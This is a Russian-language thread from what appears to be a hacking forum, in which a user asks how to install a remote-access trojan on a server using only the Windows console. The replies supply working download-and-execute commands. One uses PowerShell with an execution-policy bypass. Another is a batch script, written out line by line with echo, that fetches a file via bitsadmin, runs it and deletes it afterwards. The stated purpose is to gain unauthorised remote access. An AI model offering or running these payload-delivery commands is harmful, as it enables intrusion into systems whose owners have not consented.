• XSS.stack #1 – первый литературный журнал от юзеров форума

Как залить ратник через консоль винды?

Ott_Fon_Bismark

(L3) cache
Забанен
Регистрация
18.09.2020
Сообщения
168
Реакции
50
Пожалуйста, обратите внимание, что пользователь заблокирован
Добрий день столкнуса с задачей залить ратник или стороннее по через консоль,подойдет любое решение которое поможет получить удаленний доступ к серваку
 
Добрий день столкнуса с задачей залить ратник или стороннее по через консоль,подойдет любое решение которое поможет получить удаленний доступ к серваку
https://xss.pro/threads/41927/
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Пробуй частями:
Код:
powershell.exe -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe','C:\ProgramData\putty.exe')
powershell.exe -ExecutionPolicy Bypass (Start-Process 'C:\ProgramData\putty.exe')
И посмотри, создаётся-ли файл после первой команды.

Ну и грузить можно не только через PS:
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Пробуй частями:
Код:
powershell.exe -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe','C:\ProgramData\putty.exe')
powershell.exe -ExecutionPolicy Bypass (Start-Process 'C:\ProgramData\putty.exe')
И посмотри, создаётся-ли файл после первой команды.

Ну и грузить можно не только через PS:
как я понял дело бистрей всего в ссилке (не сирая) потому что толком перепробивал все ссл тлс разние команди(как найду решение опишу как решил и скину в теме)
 
создаем файл: D0wnl0ad.bat
Если у тебя только командная строка, то юзаем команду Echo

Пример:


Код:
echo set target=https://ozon-st.cdn.ngenix.net/s3/multimedia-2/6000075098.jpg>D0wnl0ad.bat
echo set localfile=%userprofile%\desktop\%hostname%.jpg>>D0wnl0ad.bat
echo call :Download>>D0wnl0ad.bat
...
...
....
.
.....

Важно ">" одна галочка ТОЛЬКО в первой строке, это означает писать файл с нуля, ">>", дописать в файл, не перезаписывая его с нуля.

Код:
@echo off
:: Откуда скачать.
set target=https://ozon-st.cdn.ngenix.net/s3/multimedia-2/6000075098.jpg
:: Куда положить.
set localfile=%userprofile%\desktop\%hostname%.jpg

call :Download

:Download
bitsadmin /transfer debjob /download /priority normal %target% %localfile%
:: Старт файла с ожиданием завершения процесса.
start /wait %localfile%
:: Удаляем файл после того, как он отработал.
erase %localfile% /Q
exit

Работает в любой ОС.......................................:cool:
ЗЫ: Выполнение PowerShell не всегда доступно, бывает, что эта опция выключена или сильно зарезана..., описанный мной способ работает всегда)
 
Последнее редактирование:


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх